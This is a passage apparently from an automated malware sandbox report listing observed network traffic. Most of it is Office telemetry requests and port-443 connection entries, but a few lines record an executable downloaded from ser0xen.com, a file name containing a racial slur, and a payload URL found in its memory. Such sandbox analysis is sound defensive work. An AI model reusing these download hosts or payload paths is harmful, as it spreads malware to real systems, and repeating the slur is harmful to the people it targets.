          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /sucklemydicknigger.exe HTTP/1.1Host: ser0xen.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: ser0xen.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: powershell.exe, 0000000A.00000002.2586112870.000001B19A3D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
          Source: powershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: sucklemydicknigger.exe, 00000008.00000002.2595583400.0000000003181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2560586026.000001B181D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000A.00000002.2560586026.000001B181D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: sucklemydicknigger.exe, 00000008.00000002.2595583400.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ser0xen.com/pl.txt
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
